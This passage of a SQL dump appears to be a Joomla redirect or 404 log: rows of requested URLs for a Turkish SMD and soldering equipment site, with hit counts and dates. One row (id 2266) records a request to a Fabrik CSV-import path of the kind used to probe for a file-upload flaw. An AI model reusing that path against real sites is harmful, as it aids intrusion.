23:22:51','0000-00-00 00:00:00',301),(2162,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=tr','','','',4,0,'2014-08-09 23:27:58','0000-00-00 00:00:00',301),(2163,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=tr','','','',11,0,'2014-08-09 23:39:04','0000-00-00 00:00:00',301),(2164,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=tr','','','',2,0,'2014-08-09 23:40:52','0000-00-00 00:00:00',301),(2165,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=tr','','','',8,0,'2014-08-09 23:42:14','0000-00-00 00:00:00',301),(2166,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=en','','','',12,0,'2014-08-09 23:53:56','0000-00-00 00:00:00',301),(2167,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=164&lang=tr','','','',10,0,'2014-08-10 00:02:26','0000-00-00 00:00:00',301),(2168,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=87&Itemid=99&lang=tr','','','',3,0,'2014-08-10 00:16:10','0000-00-00 00:00:00',301),(2169,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152&Itemid=153&lang=en','','','',1,0,'2014-08-10 00:27:24','0000-00-00 00:00:00',301),(2170,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=155&Itemid=81&lang=en','','','',4,0,'2014-08-10 00:46:08','0000-00-00 00:00:00',301),(2171,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=en','','','',3,0,'2014-08-10 00:50:42','0000-00-00 00:00:00',301),(2172,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=tr','','','',1,0,'2014-08-10 00:59:47','0000-00-00 00:00:00',301),(2173,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en','','','',31,0,'2014-08-10 01:33:43','0000-00-00 00:00:00',301),(2174,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=en','','','',1,0,'2014-08-10 01:59:09','0000-00-00 00:00:00',301),(2175,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=en','','','',5,0,'2014-08-10 02:07:46','0000-00-00 00:00:00',301),(2176,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=tr','','','',7,0,'2014-08-10 02:13:22','0000-00-00 00:00:00',301),(2177,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=tr','','','',6,0,'2014-08-10 02:31:29','0000-00-00 00:00:00',301),(2178,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=115&Itemid=126&lang=tr','','','',3,0,'2014-08-10 03:12:31','0000-00-00 00:00:00',301),(2179,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=en','','','',9,0,'2014-08-10 03:15:49','0000-00-00 00:00:00',301),(2180,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&Itemid=114&lang=en','','','',4,0,'2014-08-10 03:26:54','0000-00-00 00:00:00',301),(2181,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=162&lang=tr','','','',3,0,'2014-08-10 03:32:23','0000-00-00 00:00:00',301),(2182,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=en','','','',1,0,'2014-08-10 03:33:24','0000-00-00 00:00:00',301),(2183,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=en','','','',3,0,'2014-08-10 03:59:11','0000-00-00 00:00:00',301),(2184,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41:smd-firin&Itemid=55&layout=default&lang=en','','','',6,0,'2014-08-10 04:03:30','0000-00-00 00:00:00',301),(2185,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=tr','','','',123,0,'2014-08-10 04:13:22','0000-00-00 00:00:00',301),(2186,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=41&Itemid=0&lang=tr','','','',2,0,'2014-08-10 04:14:52','0000-00-00 00:00:00',301),(2187,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=en','','','',5,0,'2014-08-10 04:28:54','0000-00-00 00:00:00',301),(2188,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=tr','','','',5,0,'2014-08-10 04:32:18','0000-00-00 00:00:00',301),(2189,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=tr','','','',8,0,'2014-08-10 04:44:57','0000-00-00 00:00:00',301),(2190,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=156&lang=en','','','',60,0,'2014-08-10 04:47:10','0000-00-00 00:00:00',301),(2191,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=tr','','','',1,0,'2014-08-10 04:47:48','0000-00-00 00:00:00',301),(2192,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=136&Itemid=138&lang=tr','','','',4,0,'2014-08-10 04:53:49','0000-00-00 00:00:00',301),(2193,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=106&Itemid=113&lang=en','','','',3,0,'2014-08-10 04:58:17','0000-00-00 00:00:00',301),(2194,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=en','','','',5,0,'2014-08-10 05:14:56','0000-00-00 00:00:00',301),(2195,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=42&Itemid=27&lang=en','','','',3,0,'2014-08-10 05:16:05','0000-00-00 00:00:00',301),(2196,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=53&Itemid=&lang=en','','','',1,0,'2014-08-10 05:34:16','0000-00-00 00:00:00',301),(2197,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167&Itemid=163&lang=en','','','',3,0,'2014-08-10 05:47:50','0000-00-00 00:00:00',301),(2198,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=55&Itemid=&lang=tr','','','',1,0,'2014-08-10 05:59:54','0000-00-00 00:00:00',301),(2199,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=2&lang=en','','','',9,0,'2014-08-10 06:11:27','0000-00-00 00:00:00',301),(2200,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110&Itemid=121&lang=en','','','',4,0,'2014-08-10 06:15:15','0000-00-00 00:00:00',301),(2201,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=tr','','','',2,0,'2014-08-10 06:19:41','0000-00-00 00:00:00',301),(2202,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=tr','','','',1,0,'2014-08-10 06:23:06','0000-00-00 00:00:00',301),(2203,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=86:mx350&catid=36:orta-hizli&Itemid=&lang=en','','','',1,0,'2014-08-10 06:44:26','0000-00-00 00:00:00',301),(2204,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=110&lang=tr','','','',8,0,'2014-08-10 06:48:09','0000-00-00 00:00:00',301),(2205,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en','','','',2,0,'2014-08-10 06:56:02','0000-00-00 00:00:00',301),(2206,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en','','','',12,0,'2014-08-10 06:56:07','0000-00-00 00:00:00',301),(2207,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en','','','',9,0,'2014-08-10 06:58:15','0000-00-00 00:00:00',301),(2208,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=en','','','',8,0,'2014-08-10 07:13:42','0000-00-00 00:00:00',301),(2209,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=85&Itemid=97&lang=tr','','','',4,0,'2014-08-10 07:47:21','0000-00-00 00:00:00',301),(2210,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=167&Itemid=163&lang=en','','','',1,0,'2014-08-10 08:14:58','0000-00-00 00:00:00',301),(2211,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=tr','','','',7,0,'2014-08-10 08:15:12','0000-00-00 00:00:00',301),(2212,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=tr','','','',1,0,'2014-08-10 08:17:54','0000-00-00 00:00:00',301),(2213,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=116:sogutucu-sprey-frz&catid=40:temizleme&Itemid=127&lang=en','','','',1,0,'2014-08-10 08:44:10','0000-00-00 00:00:00',301),(2214,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116&Itemid=127&lang=en','','','',3,0,'2014-08-10 08:45:05','0000-00-00 00:00:00',301),(2215,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=116&Itemid=127&lang=en','','','',3,0,'2014-08-10 08:45:43','0000-00-00 00:00:00',301),(2216,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=tr','','','',2,0,'2014-08-10 08:57:56','0000-00-00 00:00:00',301),(2217,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en&limitstart=5','','','',1,0,'2014-08-10 09:17:38','0000-00-00 00:00:00',301),(2218,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28','','','',1,0,'2014-08-10 09:33:32','0000-00-00 00:00:00',301),(2219,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&Itemid=144&lang=en','','','',3,0,'2014-08-10 09:36:55','0000-00-00 00:00:00',301),(2220,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=125&Itemid=131&lang=en','','','',1,0,'2014-08-10 09:37:49','0000-00-00 00:00:00',301),(2221,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&Itemid=144&lang=en','','','',9,0,'2014-08-10 09:39:24','0000-00-00 00:00:00',301),(2222,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=en','','','',5,0,'2014-08-10 09:40:56','0000-00-00 00:00:00',301),(2223,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=125&Itemid=131&lang=en','','','',5,0,'2014-08-10 09:41:47','0000-00-00 00:00:00',301),(2224,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=36&Itemid=37&lang=tr','','','',38,0,'2014-08-10 09:49:21','0000-00-00 00:00:00',301),(2225,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=tr','','','',7,0,'2014-08-10 09:55:35','0000-00-00 00:00:00',301),(2226,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=en','','','',3,0,'2014-08-10 10:13:33','0000-00-00 00:00:00',301),(2227,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=tr','','','',3,0,'2014-08-10 10:20:11','0000-00-00 00:00:00',301),(2228,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=155&lang=tr','','','',8,0,'2014-08-10 10:55:17','0000-00-00 00:00:00',301),(2229,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=tr','','','',2,0,'2014-08-10 11:14:37','0000-00-00 00:00:00',301),(2230,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=82&Itemid=38&lang=en','','','',2,0,'2014-08-10 11:18:25','0000-00-00 00:00:00',301),(2231,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=96&Itemid=107&lang=en','','','',2,0,'2014-08-10 11:55:10','0000-00-00 00:00:00',301),(2232,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=tr','','','',1,0,'2014-08-10 12:07:00','0000-00-00 00:00:00',301),(2233,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=en','','','',2,0,'2014-08-10 12:10:52','0000-00-00 00:00:00',301),(2234,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=55&Itemid=1&lang=tr','','','',2,0,'2014-08-10 12:18:32','0000-00-00 00:00:00',301),(2235,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=80:cm101&catid=43:ultra-hizli&Itemid=87&lang=tr','','','',1,0,'2014-08-10 13:18:02','0000-00-00 00:00:00',301),(2236,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=116&Itemid=127&lang=en','','','',1,0,'2014-08-10 13:20:11','0000-00-00 00:00:00',301),(2237,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126&Itemid=133&lang=en','','','',4,0,'2014-08-10 13:40:12','0000-00-00 00:00:00',301),(2238,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=en','','','',20,0,'2014-08-10 14:02:42','0000-00-00 00:00:00',301),(2239,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=155&lang=en','','','',4,0,'2014-08-10 14:20:11','0000-00-00 00:00:00',301),(2240,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=tr','','','',2,0,'2014-08-10 15:12:42','0000-00-00 00:00:00',301),(2241,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=tr','','','',23,0,'2014-08-10 16:21:54','0000-00-00 00:00:00',301),(2242,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=tr','','','',4,0,'2014-08-10 17:35:11','0000-00-00 00:00:00',301),(2243,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=121&Itemid=115&lang=tr','','','',15,0,'2014-08-10 17:39:15','0000-00-00 00:00:00',301),(2244,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=en','','','',2,0,'2014-08-10 18:12:41','0000-00-00 00:00:00',301),(2245,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=en','','','',6,0,'2014-08-10 18:14:39','0000-00-00 00:00:00',301),(2246,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=en','','','',5,0,'2014-08-10 18:15:53','0000-00-00 00:00:00',301),(2247,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=tr','','','',7,0,'2014-08-10 18:29:25','0000-00-00 00:00:00',301),(2248,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109&Itemid=120&lang=tr','','','',3,0,'2014-08-10 18:29:28','0000-00-00 00:00:00',301),(2249,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=en','','','',8,0,'2014-08-10 18:31:53','0000-00-00 00:00:00',301),(2250,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=155&lang=en','','','',8,0,'2014-08-10 18:33:05','0000-00-00 00:00:00',301),(2251,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=0&lang=en','','','',1,0,'2014-08-10 18:36:17','0000-00-00 00:00:00',301),(2252,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=tr','','','',3,0,'2014-08-10 18:40:10','0000-00-00 00:00:00',301),(2253,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=en','','','',9,0,'2014-08-10 19:02:51','0000-00-00 00:00:00',301),(2254,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=164&lang=en','','','',9,0,'2014-08-10 19:05:18','0000-00-00 00:00:00',301),(2255,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=155&lang=tr','','','',6,0,'2014-08-10 19:10:00','0000-00-00 00:00:00',301),(2256,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=143&lang=en','','','',6,0,'2014-08-10 19:44:23','0000-00-00 00:00:00',301),(2257,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117&Itemid=128&lang=tr','','','',2,0,'2014-08-10 19:50:22','0000-00-00 00:00:00',301),(2258,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122&Itemid=129&lang=en','','','',2,0,'2014-08-10 20:00:58','0000-00-00 00:00:00',301),(2259,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=137&lang=tr','','','',7,0,'2014-08-10 20:31:48','0000-00-00 00:00:00',301),(2260,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=87:temizlik&catid=40:temizleme&Itemid=103&lang=tr','','','',3,0,'2014-08-10 20:47:31','0000-00-00 00:00:00',301),(2261,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=84&Itemid=96&lang=en','','','',3,0,'2014-08-10 20:51:27','0000-00-00 00:00:00',301),(2262,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=128&lang=tr','','','',3,0,'2014-08-10 20:53:22','0000-00-00 00:00:00',301),(2263,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=138&Itemid=140','','','',1,0,'2014-08-10 20:55:13','0000-00-00 00:00:00',301),(2264,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=57&Itemid=145&lang=en','','','',4,0,'2014-08-10 21:08:35','0000-00-00 00:00:00',301),(2265,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=0&lang=en','','','',1,0,'2014-08-10 21:10:11','0000-00-00 00:00:00',301),(2266,'http://led-bazaar.org/3s-technologies.com.tr/joomla//index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=2','','','',3,0,'2014-08-10 21:10:27','0000-00-00 00:00:00',301),(2267,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=tr','','','',12,0,'2014-08-10 21:15:17','0000-00-00 00:00:00',301),(2268,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=81&Itemid=40&lang=en','','','',6,0,'2014-08-10 21:17:47','0000-00-00 00:00:00',301),(2269,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=tr','','','',1,0,'2014-08-10 21:25:13','0000-00-00 00:00:00',301),(2270,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=158&lang=en','','','',13,0,'2014-08-10 21:35:15','0000-00-00 00:00:00',301),(2271,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=159&Itemid=162&lang=tr','','','',2,0,'2014-08-10 21:46:44','0000-00-00 00:00:00',301),(2272,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=127&Itemid=134','','','',6,0,'2014-08-10 21:55:13','0000-00-00 00:00:00',301),(2273,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=46&Itemid=62&lang=en','','','',15,0,'2014-08-10 22:05:52','0000-00-00 00:00:00',301),(2274,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=en','','','',3,0,'2014-08-10 22:23:08','0000-00-00 00:00:00',301),(2275,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=en&limitstart=10','','','',3,0,'2014-08-10 22:37:20','0000-00-00 00:00:00',301),(2276,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=50&lang=en','','','',5,0,'2014-08-10 22:40:10','0000-00-00 00:00:00',301),(2277,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=139:flo-master-ii&catid=56:rework-stasyonlari&Itemid=141&lang=en','','','',2,0,'2014-08-10 22:41:50','0000-00-00 00:00:00',301),(2278,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=150&Itemid=151&lang=tr','','','',8,0,'2014-08-10 22:42:38','0000-00-00 00:00:00',301),(2279,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=tr','','','',2,0,'2014-08-10 22:51:54','0000-00-00 00:00:00',301),(2280,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=109:orta-guclu-flux-giderici-dc1&catid=40:temizleme&Itemid=120&lang=en','','','',2,0,'2014-08-10 23:00:35','0000-00-00 00:00:00',301),(2281,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=tr','','','',3,0,'2014-08-10 23:07:55','0000-00-00 00:00:00',301),(2282,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=72:av131&catid=42:th-dizgi&Itemid=78&lang=en','','','',2,0,'2014-08-10 23:21:40','0000-00-00 00:00:00',301),(2283,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=151&lang=tr','','','',10,0,'2014-08-10 23:25:09','0000-00-00 00:00:00',301),(2284,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=tr','','','',3,0,'2014-08-10 23:26:03','0000-00-00 00:00:00',301),(2285,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=en','','','',5,0,'2014-08-10 23:30:14','0000-00-00 00:00:00',301),(2286,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=en','','','',4,0,'2014-08-10 23:32:45','0000-00-00 00:00:00',301),(2287,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=39&Itemid=57&lang=en','','','',15,0,'2014-08-10 23:33:24','0000-00-00 00:00:00',301),(2288,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=151:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=152&lang=en','','','',8,0,'2014-08-10 23:40:39','0000-00-00 00:00:00',301),(2289,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=&lang=en','','','',1,0,'2014-08-10 23:56:25','0000-00-00 00:00:00',301),(2290,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=47:aoi&Itemid=1&layout=default&lang=tr','','','',2,0,'2014-08-11 00:07:03','0000-00-00 00:00:00',301),(2291,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112&Itemid=123&lang=tr','','','',4,0,'2014-08-11 00:15:53','0000-00-00 00:00:00',301),(2292,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=175:rh2&catid=60:ikinciel&Itemid=164&lang=en','','','',9,0,'2014-08-11 00:18:50','0000-00-00 00:00:00',301),(2293,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=tr','','','',2,0,'2014-08-11 00:32:05','0000-00-00 00:00:00',301),(2294,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=en','','','',1,0,'2014-08-11 00:32:31','0000-00-00 00:00:00',301),(2295,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=153:ls60v&catid=58:dusuk-hizli-smd-dizgi&Itemid=154&lang=en','','','',3,0,'2014-08-11 00:36:10','0000-00-00 00:00:00',301),(2296,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=164&Itemid=160&lang=tr','','','',14,0,'2014-08-11 00:44:58','0000-00-00 00:00:00',301),(2297,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=0&lang=tr','','','',1,0,'2014-08-11 00:49:04','0000-00-00 00:00:00',301),(2298,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=en','','','',3,0,'2014-08-11 00:55:11','0000-00-00 00:00:00',301),(2299,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=149&lang=tr','','','',2,0,'2014-08-11 01:08:23','0000-00-00 00:00:00',301),(2300,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=tr','','','',8,0,'2014-08-11 01:14:35','0000-00-00 00:00:00',301),(2301,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&Itemid=145&lang=tr','','','',1,0,'2014-08-11 01:16:40','0000-00-00 00:00:00',301),(2302,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=149&lang=en','','','',6,0,'2014-08-11 01:27:07','0000-00-00 